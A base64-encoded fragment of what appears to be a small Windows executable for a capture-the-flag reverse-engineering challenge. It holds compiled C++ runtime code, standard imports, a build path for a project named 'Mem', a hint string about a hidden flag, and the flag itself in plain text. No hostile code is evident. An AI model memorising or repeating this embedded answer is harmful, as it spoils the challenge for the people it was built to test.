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QFFBRV9OX05AWgBEAj9fT3NmeEA/JGJhc2ljX29zdHJlYW1ARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVYWFoAAGgDP2ZsdXNoQD8kYmFzaWNfb3N0cmVhbUBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUFBVjEyQFhaAMUEP3NldHN0YXRlQD8kYmFzaWNfaW9zQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFWEhfTkBaAADYBD9zbmV4dGNAPyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVIWFoA4QQ/c3B1dG5APyRiYXNpY19zdHJlYW1idWZARFU/JGNoYXJfdHJhaXRzQERAc3RkQEBAc3RkQEBRQUVfSlBCRF9KQFoAAM8EP3NnZXRjQD8kYmFzaWNfc3RyZWFtYnVmQERVPyRjaGFyX3RyYWl0c0BEQHN0ZEBAQHN0ZEBAUUFFSFhaAADeBD9zcHV0Y0A/JGJhc2ljX3N0cmVhbWJ1ZkBEVT8kY2hhcl90cmFpdHNAREBzdGRAQEBzdGRAQFFBRUhEQFoAwwM/Z2V0bG9jQGlvc19iYXNlQHN0ZEBAUUJFP0FWbG9jYWxlQDJAWFoAtgE/X0dldGNhdEA/JGN0eXBlQERAc3RkQEBTQUlQQVBCVmZhY2V0QGxvY2FsZUAyQFBCVjQyQEBaADEBPz9CaWRAbG9jYWxlQHN0ZEBAUUFFSVhaAABNU1ZDUDE0MC5kbGwAABAAX19DeHhGcmFtZUhhbmRsZXIzAAAiAF9fc3RkX2V4Y2VwdGlvbl9kZXN0cm95ACEAX19zdGRfZXhjZXB0aW9uX2NvcHkAACMAX19zdGRfdGVybWluYXRlAAEAX0N4eFRocm93RXhjZXB0aW9uAABIAG1lbXNldAAANQBfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBWQ1JVTlRJTUUxNDAuZGxsAAA7AF9pbnZhbGlkX3BhcmFtZXRlcl9ub2luZm9fbm9yZXR1cm4AAAgAX2NhbGxuZXdoABkAbWFsbG9jAABCAF9zZWhfZmlsdGVyX2V4ZQBEAF9zZXRfYXBwX3R5cGUALgBfX3NldHVzZXJtYXRoZXJyAAAZAF9jb25maWd1cmVfbmFycm93X2FyZ3YAADUAX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAAqAF9nZXRfaW5pdGlhbF9uYXJyb3dfZW52aXJvbm1lbnQAOABfaW5pdHRlcm0AOQBfaW5pdHRlcm1fZQBYAGV4aXQAACUAX2V4aXQAVABfc2V0X2Ztb2RlAAAFAF9fcF9fX2FyZ2MAAAYAX19wX19fYXJndgAAFwBfY2V4aXQAABYAX2NfZXhpdAA/AF9yZWdpc3Rlcl90aHJlYWRfbG9jYWxfZXhlX2F0ZXhpdF9jYWxsYmFjawAACABfY29uZmlndGhyZWFkbG9jYWxlABYAX3NldF9uZXdfbW9kZQABAF9fcF9fY29tbW9kZQAANgBfaW5pdGlhbGl6ZV9vbmV4aXRfdGFibGUAAD4AX3JlZ2lzdGVyX29uZXhpdF9mdW5jdGlvbgAfAF9jcnRfYXRleGl0ABgAZnJlZQAAHQBfY29udHJvbGZwX3MAAGoAdGVybWluYXRlAGFwaS1tcy13aW4tY3J0LXJ1bnRpbWUtbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1oZWFwLWwxLTEtMC5kbGwAAGFwaS1tcy13aW4tY3J0LW1hdGgtbDEtMS0wLmRsbAAAYXBpLW1zLXdpbi1jcnQtc3RkaW8tbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1sb2NhbGUtbDEtMS0wLmRsbAAArQVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAG0FU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyABcCR2V0Q3VycmVudFByb2Nlc3MAjAVUZXJtaW5hdGVQcm9jZXNzAACGA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQATQRRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgAYAkdldEN1cnJlbnRQcm9jZXNzSWQAHAJHZXRDdXJyZW50VGhyZWFkSWQAAOkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAYwNJbml0aWFsaXplU0xpc3RIZWFkAH8DSXNEZWJ1Z2dlclByZXNlbnQAeAJHZXRNb2R1bGVIYW5kbGVXAABLRVJORUwzMi5kbGwAAEYAbWVtY3B5AABHAG1lbW1vdmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA